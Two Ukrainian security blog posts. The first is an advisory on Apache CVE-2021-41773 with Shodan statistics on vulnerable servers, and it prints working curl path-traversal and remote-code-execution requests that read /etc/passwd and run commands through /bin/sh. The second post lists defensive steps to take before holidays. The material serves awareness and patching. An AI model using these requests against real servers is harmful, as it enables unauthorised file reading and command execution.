“поранений” Apache або CVE-2021-41773

update#1 – 11/10 додано свіжу статистику Shodan по версіям Apache

update#2 – 13/10 додано динаміку оновлень за даними Shodan

Коротко:

У популярному web сервері Apache версії 2.4.49 було виявлено вразливість CVE-2021-41773 типу path traversal яка може переходити у RCE. При нестандартній конфігурації (Require all granted) та активованому mod-cgi Linux та Windows сервери з Apache (версій 2.4.49-2.4.50) вразливі до спеціальних GET/POST запитів, через які зловмисники можуть витягувати інформацію з файлової системи або запускати довільний код.

Увага!

Важливо чітко розуміти, що небезпеку становлять не лише опубліковані в інтернет, а й внутрішні  сервери з Apache версій 2.4.49-2.4.50 (консолі керування, документообіг тощо). Потрібно оновити усі наявні Apache і за можливості переглянути їх конфігурацію, аби ця вразливість не стала способом lateral movement для зловмисників, які вже мають закріплення в середині мережі.

Хронологія:

29/09 – розробників повідомляють про вразливість у версії 2.4.49

04/10 – виходить оновлення 2.4.50

05/10 – в мережі з’являються PoC, вразливість починають використовувати

06/10 – дослідники виявляють можливість RCE

07/10 – дослідники виявлять, що оновлення 2.4.50 можна обійти, виходить 2.4.51

08/10 – ви знаходитесь тут 

Що робити:

Якщо у вас є сервери з Apache 2.4.49 чи 2.4.50 – байдуже чи опубліковані в Інтернет чи ні, вам потрібно як можна швидше оновити їх до 2.4.51

Кому кортить власноруч перевірити власні сервери – обирайте з великої кількості PoC.

Дані Shodan по українському сегменту:

(Це статистика станом на ранок 8 жовтня)

  • Total hosts:      1,908,257
  • Total Apache:   124,741
  • 2.4.49:     576     [ country:UA product:”Apache httpd” version:”2.4.49″ ]
  • 2.4.50:     23      [ country:UA product:”Apache httpd” version:”2.4.50″ ]
  • 2.4.51:     0        [ country:UA product:”Apache httpd” version:”2.4.51″ ]

Як можна помітити, за 48 годин з моменту як стало відомо про вразливість 2.4.49, лише 23 сервери були оновлені до 2.4.50 (який на жаль, теж виявився дірявим). Потрібно оновлювати Apache до 2.4.51, але таких в UAIX поки Shodan не фіксує…

 

Станом на 11 жовтня ситуація за даними Shodan наступна:

  • 2.4.49:     439 (-137)     [ country:UA product:”Apache httpd” version:”2.4.49″ ]
  • 2.4.50:     55 (+32)      [ country:UA product:”Apache httpd” version:”2.4.50″ ]
  • 2.4.51:     47 (+47)        [ country:UA product:”Apache httpd” version:”2.4.51″ ]

update#2

цифри станом на 12 жовтня:

  • 2.4.49:    399 (-40)     [ country:UA product:”Apache httpd” version:”2.4.49″ ]
  • 2.4.50:    55 (=)      [ country:UA product:”Apache httpd” version:”2.4.50″ ]
  • 2.4.51:    80 (+33)        [ country:UA product:”Apache httpd” version:”2.4.51″ ]

цифри станом на 13 жовтня:

  • 2.4.49:    365 (-34)     [ country:UA product:”Apache httpd” version:”2.4.49″ ]
  • 2.4.50:    56 (+1)      [ country:UA product:”Apache httpd” version:”2.4.50″ ]
  • 2.4.51:    115 (+35)        [ country:UA product:”Apache httpd” version:”2.4.51″ ]

Як це виглядає:

Взяв те, що було під рукою – відносно свіжий реліз Kali, Apache 2.4.49

За специфічних умов (Require all granted + mod-cgi enabled) спеціальними запитами можна змусити веб сервер вивести зміст файлів або ж виконати команду.

Приклад запитів:

curl http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

curl ‘localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’ -d ‘A=|echo;id’

curl -s –path-as-is “http://127.0.0.1/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd”


curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

ще один варіант:

# curl ‘http://127.0.0.1/.%%32%65/.%%32%65/bin/sh’ –data ‘echo Content-type: text/plain; echo; id’

Чому це критично?

Зчитування файлів (path traversal)

Виконання команд (RCE)

Вразливість також актуальна для Apache під Windows

Запуск інтерактивного shell через вразливість Apache

 

Перелік корисних джерел:

Будьте здорові, уважні та обережні.

VR

А раптом завтра blackout ?

Доброго ранку та смачної кави, країна мрій та сподівань.

Щороку на передодні державних свят нас попереджають про можливі “страшні”, “нищівні” акібератаки. Це логічно, враховуючи постійну військову та інформаційну агресію з боку нашого північного сусіда, який дуже полюбляє присвячувати певні дії до визначних дат. Але ставитися до цього треба тверезо.

Я хочу заощадити власний час, тому викладу свої думки плюс трохи порад тут, а потім просто буду давати людям посилання на цей допис.

I. Моє ставлення до гучних заяв про “страшні атаки”

Проводити акцію у святкові дні, коли більшість систем заблоковані або вимкнені – не раціонально. Втрачати вже налагоджений persistence заради гучної акції – теж. Чомусь, частина фахівців чекає, що якість активні дії обов’язково мають відбутися саме в означений день “Х“. При цьому вони закривають очі на те, що відбулося тиждень тому, або відбувається прямо зараз.

Я скептично ставлюся до повідомлень про можливі атаки через те, що з одного боку це призводить до зайвої метушні, а з іншого – вже після свят, коли слава Богу лиха не сталося – ІТ\ІБ на місцях видихають. Люди перестають бути уважними, відчуття небезпеки притуплюється.

Насправді, в частині конкретних організації вже давно є “пробиті” скомпрометовані системи через які відбувається стеження за жертвою та витік корисних документів. Моє особисте бачення – якщо щось більше за щоденні “прильоти” malware і має відбутися, то робота вже проведена – імпланти вже закладено в ті системи, до яких змогли дотягнутися чужі руки. Всі так чекають повторення 2017го, що ладні пропустити спокійне існування стілерів та RAT на скомпрометованих системах. І це тупо.

Тому замість метушні і паніки, на мою скромну думку, відповідальним за безпеку варто звернути увагу на те, що актуально в цьому сезоні, а саме:

  • ProxyShell та ProxyLogon для тих у кого “наземний” MS Exchange
  • PrintNightmare для тих у кого друк на Windows
  • HiveNightmare та інші “свіжі” вразливості до яких уже є експлойти

Так само не варто забувати про класичні точки входу типу фішингових листів та зовнішнього доступу (Web, RDP, VPN).

II. Що варто зробити саме сьогодні:

Перед тим, як піти на вихідні і почати святкувати, було б не погано:

  • Перевірити критичні сервери  Autoruns та Process Explorer (*обов’язково із включеною перевіркою підписів)
  • Уважно передивитися усі задачі в планувальнику ОС TaskSchedulerView
  • Усі підозрілі або невідомі запускні файли перевірити через Intezer або хоча би VirusTotal
  • Перезавантажити критичні сервери, проконтролювати роботу сервісів
  • Змінити паролі адмінів та примусово змусити користувачів змінити їх паролі. Так, саме сьогодні.
  • Створити свіжі бекапи критичних серверів
  • Перевірити відновлення хоча би 1-2 бекапи
  • Переконатися, що бекапи складені на окремій системі з обмеженим доступом
  • Якщо сервер з бекапами є членом домену і ви не змогли або не захотіли змінювати паролі – можливо, на період свят варто вимкнути його або відключити від мережі
  • Переконатися, що чергова зміна або той адмін, який буде в зоні доступу на свята знає порядок дій при інцидентах
  • На ключових серверах налаштуйте і залиште Sysmon для моніторингу запуску\видалення\створення нових файлів
  • Вимкніть ті системи, які не є критичними для роботи установи у святкові дні, залишайте лише потрібне
  • Перевірте AD на предмет активних “мертвих душ” – можливо частина облікових записів вже не потрібна
  • Скористайтеся Shodan Monitor аби відстежувати зміни по сервісам запущеним на ваших публічних ІР
  • Покажіть керівництву і перевірте разом з ними їх скриньки
  • Перевірте зовнішній доступ (Web, VPN, RDP!) і заблокуйте тих, кому на ці кілька днів точно не знадобиться підключатися

Цей текст не є і не може бути універсальним вирішенням усіх можливих проблем, але це спроба сформулювати ключовий набір того, що конче треба зробити перед тим, як йти на вихідні / свята.

Головна ідея цього допису – люди, прокиньтесь, досить чекати що вас спробують атакувати )_тільки_ 28го чи 24го! Поводьтеся так, наче вас вже атакувати і отримали доступ до однієї з ваших систем.

І я буду безмежно радий, якщо минуть вихідні і свята і черговий раз нічого глобально критичного не “впаде” і не поламається. Головне не втрачати пильність.

“Ошибка ученого — это, в конечном счете, его личное дело. А мы ошибаться не должны. Нам разрешается прослыть невеждами, мистиками, суеверными дураками. Нам одного не простят: если мы недооценили опасность. И если в нашем доме вдруг завоняло серой, мы просто не имеем права пускаться в рассуждения о молекулярных флуктуациях — мы обязаны предположить, что где-то рядом объявился черт с рогами, и принять соответствующие меры, вплоть до организации производства святой воды в промышленных масштабах.” Рудольф Сикорски

Маю надію, що наведене вище комусь стане у нагоді.

Будьте здорові, уважні та обережні.

Слідкуйте за нашою сторінкою у Facebook https://www.facebook.com/Optidata.com.ua/

VR